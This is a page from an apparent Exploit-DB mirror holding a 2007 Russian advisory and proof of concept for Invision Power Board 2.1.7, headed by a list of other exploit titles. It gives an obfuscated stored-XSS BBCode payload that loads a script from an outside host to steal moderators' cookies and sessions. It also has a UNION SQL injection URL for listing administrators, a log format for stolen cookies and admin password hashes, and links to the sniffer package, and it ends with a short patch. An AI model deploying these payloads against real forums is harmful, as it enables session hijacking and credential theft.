bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/php/webapps/4841.txt
Offensive Security ed0e1e4d44 DB: 2018-09-25 
1979 changes to exploits/shellcodes

Couchdb 1.5.0 - 'uuids' Denial of Service
Apache CouchDB 1.5.0 - 'uuids' Denial of Service

Beyond Remote 2.2.5.3 - Denial of Service (PoC)
udisks2 2.8.0 - Denial of Service (PoC)
Termite 3.4 - Denial of Service (PoC)
SoftX FTP Client 3.3 - Denial of Service (PoC)

Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection
SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection

Silverstripe CMS 3.0.2 - Multiple Vulnerabilities
SilverStripe CMS 3.0.2 - Multiple Vulnerabilities

Silverstripe CMS 2.4 - File Renaming Security Bypass
SilverStripe CMS 2.4 - File Renaming Security Bypass

Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities
SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities

Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection
SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection

Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload
SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload

Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
SilverStripe CMS 2.4.x - 'BackURL' Open Redirection

Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure
SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure

Silverstripe CMS - Multiple HTML Injection Vulnerabilities
SilverStripe CMS - Multiple HTML Injection Vulnerabilities

Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

Monstra CMS before 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)

Monstra CMS < 3.0.4 - Cross-Site Scripting
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Navigate CMS 2.8 - Cross-Site Scripting
Collectric CMU 1.0 - 'lang' SQL injection
Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection
LG SuperSign EZ CMS 2.5 - Remote Code Execution
MyBB Visual Editor 1.8.18 - Cross-Site Scripting
Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection
Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
RICOH Aficio MP 301 Printer - Cross-Site Scripting
Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
RICOH MP C6003 Printer - Cross-Site Scripting

Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)
Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
2018-09-25 05:01:51 +00:00

94 lines
No EOL
3.8 KiB
Text
Raw Blame History

----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]
INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________ \ \ \
/ .\ / /_// // / \ \/ __ \ /__/ /
/ / /_// /\ / / / / /___/
\/ / / / / /\ / / /
/ / \/ / / / / /__ //\
\ / ____________/ / \/ __________// /__ // /
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\
\ \\ // // /
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .
. \_\\________[________________________________________]_________//_//_/ . .
----[ NITRO ... ]
This vulnerability was already found before, but there was no available
public "figting" exploit for it. This POC consists of several parts - active xss generator,
JS-file, which will be caused at visiting page with xss, log viewer and special component,
which will take necessary data from MySQL forum's tables in case if intercepted session
belonged to the person with moderator privileges.
----[ ANALYSIS ... ]
XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss for
future injetion on the forum board. As the reference it is necessary to specify the full way
up to ya.js file (in which you have already preliminary corrected way on your own). Most likely
it is necessary only to press the button.
[img]http://www.ya.ru/[snapback] onerror=script=document.createElement(String.fromCharCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
style=visibility:hidden =[/snapback].gif[/img]
The injection can be executed only when there is available session of the user with access
in moderator's panel.It is necessary to result "starter" parameter to numerical by means of "intval"
function.In case of successfull injection there is an oppotunity to enumerate forums' administrators team:
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*
----[ RECORD ... ]
{
---IP ADDRESS sniffed ip address
---REFERER xssed theme
---COOKIES xssed cookies of forum member
---USER ID xssed user id of forum member
---ADMIN NAME admin username
---ADMIN PASS admin pass hash
---ADMIN SALT admin hash salt
}
----[ PATCH ... ]
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
regex_check_image
LINE
924
REPLACE
if ( preg_match( "/[?&;]/", $url) )
ON
if ( preg_match( "/[?&;\<\[]/", $url) )
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
post_db_parse_bbcode
LINE
486
REPLACE
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
ON
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
if ( $row['bbcode_tag'] == 'snapback' )
{
$match[2][$i] = intval( $match[2][$i] );
}
www.underwater.itdefence.ru/isniff.rar
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4841.rar (2008-isniff.rar)
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
OSVDB: 51280, 51281
# milw0rm.com [2008-01-05]
Reference in a new issue View git blame Copy permalink